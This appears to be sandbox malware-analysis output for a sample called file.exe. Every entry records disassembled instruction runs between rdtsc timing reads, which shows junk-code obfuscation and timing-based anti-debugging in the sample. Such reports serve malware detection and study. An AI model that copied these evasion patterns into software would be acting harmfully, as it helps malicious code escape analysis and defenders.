Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7579F8 second address: 757A10 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F36ED361E10h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push edx 0x0000000c pop edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 757A10 second address: 757A2B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F36EC8543CDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 75BE07 second address: 75BE0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 75BE0C second address: 75BE17 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnl 00007F36EC8543C6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 75C766 second address: 75C781 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F36ED361E17h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 75C781 second address: 75C796 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F36EC8543CCh 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 75C796 second address: 75C7A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jnp 00007F36ED361E06h 0x0000000d push edx 0x0000000e pop edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 75C902 second address: 75C906 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 75C906 second address: 75C912 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F36ED361E06h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 75C912 second address: 75C933 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F36EC8543D9h 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 75C933 second address: 75C937 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 75CAAD second address: 75CAB1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 75CAB1 second address: 75CAB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 75CEB6 second address: 75CEBC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 75CEBC second address: 75CEC0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 75CEC0 second address: 75CEC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 75CEC6 second address: 75CED9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b jg 00007F36ED361E06h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 75CED9 second address: 75CEFA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F36EC8543D4h 0x00000009 popad 0x0000000a jl 00007F36EC8543C8h 0x00000010 push eax 0x00000011 pop eax 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 75CEFA second address: 75CF01 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6E5D73 second address: 6E5D77 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6E5D77 second address: 6E5D7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6E5D7D second address: 6E5D90 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F36EC8543CEh 0x00000008 push edi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6E5D90 second address: 6E5DC9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 jmp 00007F36ED361E19h 0x0000000d jmp 00007F36ED361E0Fh 0x00000012 pushad 0x00000013 pushad 0x00000014 popad 0x00000015 push ecx 0x00000016 pop ecx 0x00000017 pushad 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6E5DC9 second address: 6E5DD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 762941 second address: 76295B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F36ED361E15h 0x00000009 pop edi 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 76295B second address: 762975 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F36EC8543D5h 0x00000007 push ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 762AB8 second address: 762ABC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7630FA second address: 76311A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F36EC8543DCh 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 76311A second address: 76311F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 76311F second address: 763132 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 jnl 00007F36EC8543C6h 0x0000000c push esi 0x0000000d pop esi 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 762620 second address: 762625 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 762625 second address: 762644 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F36EC8543D2h 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 762644 second address: 762648 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 762648 second address: 76264C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 76342C second address: 763432 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 763432 second address: 76344D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F36EC8543D7h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 76344D second address: 763459 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push edx 0x0000000a pop edx 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 763459 second address: 763474 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007F36EC8543CEh 0x00000008 pop edi 0x00000009 pushad 0x0000000a jnp 00007F36EC8543C6h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 763474 second address: 763491 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F36ED361E14h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 763491 second address: 763497 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 763497 second address: 76349B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 76349B second address: 76349F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 763628 second address: 76362E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 76362E second address: 763637 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 763637 second address: 763641 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F36ED361E06h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 763641 second address: 76366D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F36EC8543D5h 0x0000000d jmp 00007F36EC8543CFh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 76BF02 second address: 76BF07 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 76AA06 second address: 76AA40 instructions: 0x00000000 rdtsc 0x00000002 js 00007F36EC8543C6h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push esi 0x0000000d jmp 00007F36EC8543CDh 0x00000012 pop esi 0x00000013 jmp 00007F36EC8543D2h 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b jc 00007F36EC8543CEh 0x00000021 pushad 0x00000022 popad 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 76AA40 second address: 76AA56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 jno 00007F36ED361E06h 0x0000000b jmp 00007F36ED361E0Ah 0x00000010 pop edi 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 76AD10 second address: 76AD14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 76AE54 second address: 76AE58 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 76AE58 second address: 76AE7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F36EC8543D6h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop esi 0x0000000c push eax 0x0000000d push edx 0x0000000e push edx 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 pop edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 76AFD7 second address: 76AFFC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jp 00007F36ED361E06h 0x00000009 jmp 00007F36ED361E0Bh 0x0000000e jg 00007F36ED361E06h 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c popad 0x0000001d pushad 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 76AFFC second address: 76B004 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 76B162 second address: 76B16E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop eax 0x00000007 popad 0x00000008 push ecx 0x00000009 push esi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 76B42C second address: 76B43C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F36EC8543CAh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 76B43C second address: 76B455 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F36ED361E0Fh 0x00000009 popad 0x0000000a pushad 0x0000000b push edx 0x0000000c pop edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 76B455 second address: 76B45B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 76B45B second address: 76B461 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 76B5F1 second address: 76B5F6 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 76B792 second address: 76B7DD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F36ED361E14h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F36ED361E19h 0x00000012 jmp 00007F36ED361E16h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 76B929 second address: 76B939 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F36EC8543CAh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 76B939 second address: 76B943 instructions: 0x00000000 rdtsc 0x00000002 je 00007F36ED361E12h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 76B943 second address: 76B949 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 76B949 second address: 76B951 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 76B951 second address: 76B955 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 76B955 second address: 76B959 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 76B959 second address: 76B966 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 76B966 second address: 76B98B instructions: 0x00000000 rdtsc 0x00000002 je 00007F36ED361E06h 0x00000008 jnp 00007F36ED361E06h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 jmp 00007F36ED361E11h 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 76B98B second address: 76B99A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F36EC8543CBh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7130B1 second address: 7130B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7130B7 second address: 7130C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7130C1 second address: 7130CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 push ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 76BD59 second address: 76BD6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F36EC8543D0h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 76BD6D second address: 76BD7F instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jno 00007F36ED361E0Ch 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 76A581 second address: 76A595 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 push ecx 0x0000000a jg 00007F36EC8543CEh 0x00000010 push edi 0x00000011 pop edi 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 76A595 second address: 76A5A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 jnc 00007F36ED361E06h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 76F47F second address: 76F48F instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jo 00007F36EC8543C6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push esi 0x0000000f pop esi 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 76F48F second address: 76F493 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 773615 second address: 77361C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 72E087 second address: 7125D0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jno 00007F36ED361E11h 0x0000000c popad 0x0000000d nop 0x0000000e xor dword ptr [ebp+122D28E6h], ecx 0x00000014 lea eax, dword ptr [ebp+1247FDE3h] 0x0000001a call 00007F36ED361E0Ch 0x0000001f add ecx, 08F64C78h 0x00000025 pop edx 0x00000026 nop 0x00000027 push ecx 0x00000028 jmp 00007F36ED361E13h 0x0000002d pop ecx 0x0000002e push eax 0x0000002f jmp 00007F36ED361E0Fh 0x00000034 nop 0x00000035 push 00000000h 0x00000037 push eax 0x00000038 call 00007F36ED361E08h 0x0000003d pop eax 0x0000003e mov dword ptr [esp+04h], eax 0x00000042 add dword ptr [esp+04h], 00000019h 0x0000004a inc eax 0x0000004b push eax 0x0000004c ret 0x0000004d pop eax 0x0000004e ret 0x0000004f mov ecx, dword ptr [ebp+122D2C27h] 0x00000055 call dword ptr [ebp+122DB66Ch] 0x0000005b jg 00007F36ED361E36h 0x00000061 push eax 0x00000062 push edx 0x00000063 push eax 0x00000064 push edx 0x00000065 pushad 0x00000066 popad 0x00000067 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 72E2C2 second address: 72E2C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 72E715 second address: 72E732 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F36ED361E19h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 72E732 second address: 72E739 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 72E739 second address: 72E759 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 jns 00007F36ED361E0Ah 0x0000000e mov eax, dword ptr [esp+04h] 0x00000012 push eax 0x00000013 push edx 0x00000014 push ebx 0x00000015 je 00007F36ED361E06h 0x0000001b pop ebx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 72E759 second address: 72E78E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F36EC8543D6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b push eax 0x0000000c jmp 00007F36EC8543CAh 0x00000011 pop eax 0x00000012 mov dword ptr [esp+04h], eax 0x00000016 pushad 0x00000017 jng 00007F36EC8543CCh 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 72EB9F second address: 72EBC1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F36ED361E0Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b jbe 00007F36ED361E0Ch 0x00000011 push eax 0x00000012 push edx 0x00000013 push edi 0x00000014 pop edi 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 72F275 second address: 72F28F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 pushad 0x00000009 popad 0x0000000a pop eax 0x0000000b pop ecx 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 push eax 0x00000011 push edx 0x00000012 jo 00007F36EC8543C8h 0x00000018 push esi 0x00000019 pop esi 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 72F28F second address: 72F2BC instructions: 0x00000000 rdtsc 0x00000002 jl 00007F36ED361E08h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [eax] 0x0000000e push esi 0x0000000f jmp 00007F36ED361E10h 0x00000014 pop esi 0x00000015 mov dword ptr [esp+04h], eax 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c jl 00007F36ED361E06h 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 72F305 second address: 72F352 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 je 00007F36EC8543DAh 0x0000000c jmp 00007F36EC8543D4h 0x00000011 nop 0x00000012 ja 00007F36EC8543D1h 0x00000018 jmp 00007F36EC8543CBh 0x0000001d lea eax, dword ptr [ebp+1247FE27h] 0x00000023 mov ecx, dword ptr [ebp+122D2B2Bh] 0x00000029 push eax 0x0000002a push eax 0x0000002b push edx 0x0000002c jng 00007F36EC8543CCh 0x00000032 jp 00007F36EC8543C6h 0x00000038 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 72F352 second address: 72F3CB instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F36ED361E11h 0x00000008 jmp 00007F36ED361E0Bh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f mov dword ptr [esp], eax 0x00000012 push 00000000h 0x00000014 push esi 0x00000015 call 00007F36ED361E08h 0x0000001a pop esi 0x0000001b mov dword ptr [esp+04h], esi 0x0000001f add dword ptr [esp+04h], 0000001Bh 0x00000027 inc esi 0x00000028 push esi 0x00000029 ret 0x0000002a pop esi 0x0000002b ret 0x0000002c sub dword ptr [ebp+122D1B58h], esi 0x00000032 lea eax, dword ptr [ebp+1247FDE3h] 0x00000038 push 00000000h 0x0000003a push ecx 0x0000003b call 00007F36ED361E08h 0x00000040 pop ecx 0x00000041 mov dword ptr [esp+04h], ecx 0x00000045 add dword ptr [esp+04h], 00000015h 0x0000004d inc ecx 0x0000004e push ecx 0x0000004f ret 0x00000050 pop ecx 0x00000051 ret 0x00000052 mov dword ptr [ebp+12455BACh], edx 0x00000058 jnl 00007F36ED361E09h 0x0000005e push eax 0x0000005f push eax 0x00000060 push edx 0x00000061 push edx 0x00000062 push eax 0x00000063 push edx 0x00000064 rdtsc
